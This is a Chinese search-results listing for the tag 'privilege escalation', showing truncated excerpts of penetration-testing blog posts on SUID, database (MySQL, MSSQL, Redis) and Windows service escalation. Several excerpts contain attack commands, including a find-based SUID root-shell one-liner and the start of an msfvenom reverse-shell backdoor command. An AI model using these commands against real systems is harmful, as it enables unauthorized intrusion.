搜索结果
查询Tags标签: 提权,共有 108条记录-
2022春招记录
pingcap一面 自我介绍 略 面试题 CTF培训相关(没问)SQL注入相关知识,从基础的HTML+CSS到SQL增删改查,再到Mysql注入天书(学长编写),用sqli-labs实操教学 AWD相关知识(平台搭建、AWD基本流程、常见的攻击脚本和Waf、权限维持,比如不死马编写)SQL注入判断数据库类型…
2022/3/1 23:51:55 人评论 次浏览 -
14.powershell提权相关
powershell提权 # 默认执行命令后会直接关闭 runas /user:administrator "powershell pwd" #直接已管理员权限打开新的管理员窗格runas /user:administrator "powershell"#前一个命令的结果复制给变量 $res=pwd
2022/2/21 7:26:12 人评论 次浏览 -
SUID提权(一)
大家好,我是东北码农。今天和大家分享linux下的SUID提权。 本文会按照下面主题进行分享:什么是提权 什么是SUID提权 用户、进程凭证、文件权限下一篇文章会分享:CVE-2021-4034 漏洞讲解 CVE-2021-4034 利用实战 这个漏洞发现还不到3个月,应该还可以用奥。0x1 什么是提…
2022/2/19 6:11:46 人评论 次浏览 -
Linux提权方法小结
1 find 命令提权 1.1 方法一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \;-quit1.2 方法二 touch getshell find / -type f -name getshell -exec "whoami" \; find / -type f -name getshell -exec "/bin/sh" \;1.3 方法三…
2022/2/18 7:14:04 人评论 次浏览 -
简单的域渗透
参考大师傅的连接 内网渗透-完整的域渗透文章目录 一些基本知识域:域控制器:活动目录:域用户: 建立域环境域渗透知识点:木马生成&msf上线知识点:简单提权尝试简单的提权操作 知识点:信息收集&主机探测知识点:设置路由数据库登录模块提权(未完成失败了) …
2022/2/10 23:13:15 人评论 次浏览 -
thinkphp5-failed to open stream: Permission denied-文件夹循环提权
异常信息原因 runtime 文件夹没有写权限,导致failed to open stream 解决chmod -R a+wr /www/wwwroot/hoaom/runtime/temp/
2022/2/10 9:42:48 人评论 次浏览 -
一次内网实战记录
公网JBoss getshell JBoss未授权访问,进入JBoss管理控制台可以通过加载远程的war来部署木马。 可以手工写入webshell,但是我使用手测出报错。 可以使用下面的exp,jexboss还是非常好用的,可以反弹msf,也可以代理模式运行。 https://github.com/joaomatosf/jexboss.gi…
2022/2/9 23:47:41 人评论 次浏览 -
metasploit之Windows Services漏洞提权实战——利用Windows服务是以SYSTEM权限运行的,如果配置错误让我们修改该服务的二进制文件路径属性,则可以实现提权
metasploit之Windows Services漏洞提权实战001引言 在获得目标机器基本权限以后,面临我们最大的问题就是如何从普通用户提升为管理员用户。众所周知,Windows服务是以SYSTEM权限运行的,因此,它们的文件夹、文件和注册的键值,都是受到强访问控制保护的。但在某些情况下…
2022/2/7 7:14:21 人评论 次浏览 -
63:权限提升-Linux脏牛内核漏洞&SUID&信息收集
63:权限提升-Linux脏牛内核漏洞&SUID&信息收集思维导图本课重点案例1:linux提权自动化脚本利用-4个脚本 案例2:linux提权suid配合脚本演示-Aliyun 案例3:linux提权本地配合内核漏洞演示-Mozhe-本地提权 案例4:linux提权脏牛内核漏洞演示-Vulnhub,Aliyun案例…
2022/2/7 7:12:55 人评论 次浏览 -
oracle提权执行命令工具oracleShell v0.1
from:https://www.cnblogs.com/rebeyond/p/7928887.html帮一个兄弟渗透的过程中在内网搜集到了不少oracle连接密码,oracle这么一款强大的数据库,找了一圈发现没有一个方便的工具可以直接通过用户名密码来提权的。想起来自己之前写过一个oracle的连接工具,拿出来分享下…
2022/2/6 2:12:54 人评论 次浏览 -
61:权限提升-Redis&Postgre&令牌窃取&进程注入;令牌窃取相当于窃取session-token;进程注入提权就是利用system权限的进程“附身”
61:权限提升-Redis&Postgre&令牌窃取&进程注入本课内容案例1:Redis数据库权限提升-计划任务1、利用计划任务执行命令反弹shell 2、写入ssh-keygen公钥然后使用私钥登陆 3、权限较低往web物理路径写webshell 4、修复方案案例2:PostgreSQL数据库权限提升-漏洞…
2022/2/6 2:12:48 人评论 次浏览 -
Mysql UDF提权方法
Mysql UDF提权方法 0x01 UDF# UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。 0x02 windows下udf提权的条件#如果mysql版本…
2022/2/5 19:13:08 人评论 次浏览 -
MySQL提权之启动项提权——开机启动的程序,那时候启动的程序权限都是system
MySQL提权之启动项提权 原理:windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的。关于MySQL的启动项提权,听其名知其意。就是将一段 VBS脚本导入到 C:\…
2022/2/5 19:12:40 人评论 次浏览 -
MSSQL提权之xp_cmdshell、SP_OACreate
MSSQL提权之xp_cmdshell阅读目录(Content)0x01 前提 0x02 xp_cmdshell0x03 提权回到顶部(go to top) 一、简介 xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令 shell 执行,并以文本行的形式返回所有输出。 三、SQL Server 2005中的xp_cmdshell 由于…
2022/2/5 19:12:29 人评论 次浏览 -
webshell拿到网站权限后使用MSF提权--利用高权限进程提权,msf操作过程和永恒之蓝类似
原文:https://www.cnblogs.com/hkleak/p/5770300.html 在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikat…
2022/2/5 7:12:50 人评论 次浏览
